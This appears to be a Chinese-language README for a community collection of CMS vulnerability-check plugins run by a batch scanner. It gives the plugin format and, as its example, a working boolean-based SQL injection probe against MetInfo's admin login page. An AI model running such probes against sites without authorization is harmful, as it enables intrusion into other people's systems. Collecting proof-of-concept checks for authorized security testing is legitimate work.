个人精力有限,故公开此项目让感兴趣的人一起搜集插件为自己/作者扫描器提供强力的驱动 如果感兴趣为本项目提供支持,可以联系本人QQ2563152103
-
项目说明
本项目插件现已支持Python3 不再兼容Python2,故若要使用 ShellFrameworkd 进行批量扫描,请自行修改插件支持Python2ShellFrameworkd批量扫描将会再之后修改为支持Python3ShellFrameworkd
已更名为PocBatch-M并支持了Python3
-
现有的cms插件
-
插件编写格式,
class Exploit:
def attack(self, url):
# 这里写验证漏洞的一些代码
return "返回(提示)字符串"
调用 Exploit().attack(url)
以metinfo_login_lang_sql
插件为例
import requests
from urllib.parse import quote
class Exploit:
def attack(self, url):
true_url = url + "/admin/login/login_check.php?langset=cn" + quote("' and '1' ='1")
false_url = url + "/admin/login/login_check.php?langset=cn" + quote("' and '1' ='2")
response = requests.get(true_url)
response2 = requests.get(false_url)
if 'not have this language' in response2.text and 'not have this language' not in response.text:
return "{} has SQL Injection!".format(true_url)
- 拒绝重复插件, 新增了一个
find.py
, 通过特征来搜索已存在的脚本是否含有指定特征 使用方法:- 方法一:
python3 find.py cms名称 特征
例如python3 find.py dedecms /install/index.php
- 方法二:
python3 find.py 特征
例如python3 find.py /install/index.php
(如果不指定cms, 则会查找本地所有的插件)
- 方法一: